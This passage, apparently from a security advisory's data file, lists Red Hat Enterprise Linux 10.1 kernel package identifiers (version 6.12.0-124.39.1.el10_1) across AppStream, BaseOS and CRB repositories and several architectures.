"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
